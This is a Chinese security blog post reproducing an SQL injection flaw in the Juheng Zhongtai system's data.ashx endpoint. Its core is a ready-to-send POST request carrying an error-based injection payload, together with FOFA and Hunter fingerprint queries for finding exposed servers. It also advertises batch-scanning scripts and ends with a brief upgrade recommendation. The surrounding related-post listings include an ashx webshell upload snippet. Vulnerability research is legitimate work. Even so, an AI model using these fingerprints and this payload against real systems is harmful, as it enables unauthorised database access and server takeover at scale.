聚恒中台系统 data.ashx 文件存在SQL注入漏洞

最新推荐文章于 2024-05-27 19:35:11 发布
最新推荐文章于 2024-05-27 19:35:11 发布
阅读量727 收藏 8
点赞数 17
分类专栏: 漏洞复现集合 文章标签: sql 数据库 web安全 安全 网络安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d2407169866/article/details/139116138
版权

  0x01 免责声明

文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。

0x02 漏洞描述

聚恒中台是山东聚恒网络技术有限公司打造的一体化、数字化、精细化、智能化的信息管理系统。

聚恒中台data.ashx 文件存在SQL注入漏洞、可以rce 。

0x03 测绘查询-系统指纹

fofa:body="sysplat/dataget/data.ashx?type=sendvalidatecode"

鹰图:web.icon=="b4a324f47f54b46cb38c016814c975e0"

0x04 漏洞复现

1、访问漏洞系统

2、发送POST包,发现聚恒中台系统存在SQL注入

3、漏洞利用POC

POST /sysplat/dataget/data.ashx?type=sendvalidatecode HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 57

usercode=1' and 1=(convert(int,@@version))--&&mobile=

0x05 Nuclei POC 批量验证脚本

加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc

点击链接加入帮会:加入帮会-发现更有料的网安圈基于安全从业者同行主题交流需求,为入驻者提供WIKI建设、安全经验输出、前沿技术及工具分享等模块,入驻即可共探安全思路。icon-default.png?t=N7T8https://wiki.freebuf.com/front/societyFront?invitation_code=2e2d0438&society_id=186&source_data=2

扫描也可加入:

0x06 漏洞修复建议

系统已发布漏洞修复版本,建议升级到最新版本:

http://www.focusinsoft.com/

渗透安全Sec
关注
  • 17
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
广联达Linkworks GetAuthorizeKey.ashx 文件上传漏洞复现
0xSec
01-08 979
由于广联达 LinkWorks /Services/FileService/UserFiles/GetAuthorizeKey.ashx接口处设置不当,未经身份认证的攻击者通过该漏洞上传恶意文件,可导致恶意代码执行、身份伪造、后门植入、敏感数据泄露,服务器被控等问题。
广联达Linkworks 多处 XML实体注入漏洞复现
0xSec
01-08 1219
​广联达 LinkWorks /GB/LK/Document/DataExchange/DataExchange.ashx、/Mail/Services/EmailAccountOrgUserService.asmx/GetUserCodesByOrgCodes等接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
漏洞复现】中成科信票务管理系统 SeatMapHandler.ashx SQL注入漏洞
siu~
05-27 224
中成科信票务管理系统 SeatMapHandler.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
聚恒中台系统 data.ashx SQL注入致RCE漏洞复现
0xSec
05-21 624
聚恒中台系统 data.ashx 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
ashx漏洞福利包
04-04
网上能找到的ashx漏洞都在这里了。亲测可用。不要积分。不喜勿喷。
aspx写cs后台代码(突破上传过滤一招,利用ashx)
jelenyoung的专栏
06-17 4462
http://www.2cto.com/Article/201302/188962.html 前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧, 正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。   用自动扫描脚本扫描出敏感目录 inc/ewebeditor/admin_login.asp 既然有ewebeditor编辑器那就尝试下
jquery向.ashx文件post中文乱码问题的解决方法
10-28
jquery向.ashx文件post中文乱码问题的解决方法,需要的朋友可以参考下。
在.ashx文件中获取cookies值实现代码
10-27
在`.ashx`文件中获取Cookie值是常见的操作,这对于理解和优化Web应用程序的功能至关重要。下面我们将详细讲解如何在`.ashx`文件中创建、读取和测试Cookie值。 首先,我们来看创建Cookie的代码部分: ```csharp ...
*.ashx文件不能访问Session值的解决方法
10-25
主要介绍了*.ashx文件不能访问Session值的解决方法,只需在头部引用一个命名空间即可解决问题,非常实用,需要的朋友可以参考下
asp.net *.ashx类型的文件使用说明
01-02
解决方案:使用ashx文件。 1. 使用ASHX handlers 首先,我们要回顾要使用ASHX文件的目标,我们要做的是在一个地址中用ASHX文件并动态的返回内容。 我们将用到querystring,最后的地址格式为(例子): ...
ashx文件 验证是否登录_Web文件上传漏洞小结
weixin_39562197的博客
11-22 571
在现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,然而向用户提供的功能越多,Web应用受到攻击的风险就越大,如果Web应用存在上传文件漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站权限。文件上传漏洞介绍在一般情况下,文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。要完成这个攻击,需要满足如下几个条件:上传...
Asp.net jQuery与ashx 安全性问题 (一般处理程序的安全问题) ashx 安全
LBD的博客
08-29 2292
Asp.net jQuery与ashx 安全性问题浏览次数:235次悬赏分:0 | 解决时间:2011-6-30 13:37 | 提问者:wjta168Asp.net jQuery与ashx 安全性问题, jQuery与ashx结合,效果很好,但安全性呢? 第一次接触这种方式,请
ashx脚本写入脚本文件webshell
收集盒 Book box
05-08 2249
<br />如果ewebeditor过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<br /><%@ WebHandler Language="C#" Class="Handler" %><br />using System;<br />using System.Web;<br />using System.IO;<br />public class Handler : IHttpHandler {<br /><br
智明OA漏洞学习——EmailDownload.ashx 任意文件下载漏洞
记录并分享学习安全的知识点..
05-02 7310
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息。 二、影响版本 智明SmartOA产品,影响版本不详。 三、漏洞复现 验证poc如下: /file/EmailDownload.ashx?url=~/web.config&name=w...
ashx上传绕过
xiaoshan812613234的专栏
12-17 1446
在上传类型添加ashx类,上传一个ashx文件,a.ashx,代码如下: using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentT
总结一些上传漏洞利用方法
IT技术宅-北方的刀郎
03-21 2331
总结一些上传漏洞利用方法作者:qxz_xp   发布:2013-10-26 11:43   分类:菜鸟入门, 黑客技术, 黑客攻防   暂无评论  1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都
ashx文件 验证是否登录_【文件上传漏洞】uploadlabs pass121
weixin_39929687的博客
11-27 182
什么是upload-labs:upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。文件上传漏洞思维导图:0x01 前端验证后端代码:<script type="text/javascript">function checkFile() {var...
requests库 调用.ashx接口
最新发布
06-05
requests是一个Python第三方库,它提供了一种简单且优雅的方式来发送HTTP/1.1请求,也支持发送文件、Cookie等。在使用requests库调用.ashx接口时,可以使用requests库的post方法,将需要传递的参数以字典形式传递给post方法,然后指定接口URL,即可向该接口发送POST请求。 示例代码如下所示: ```python import requests # 构造需要传递的参数 data = { 'param1': 'value1', 'param2': 'value2' } # 指定接口URL url = 'http://example.com/api.ashx' # 发送POST请求 response = requests.post(url, data=data) # 打印返回结果 print(response.text) ``` 需要注意的是,在使用requests库发送POST请求时,如果接口需要传递的参数不是通过URL参数传递,而是通过请求体传递,则需要将参数以字典形式传递给post方法的data参数。如果接口需要传递的参数是JSON格式,则可以将参数以字典形式传递给post方法的json参数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值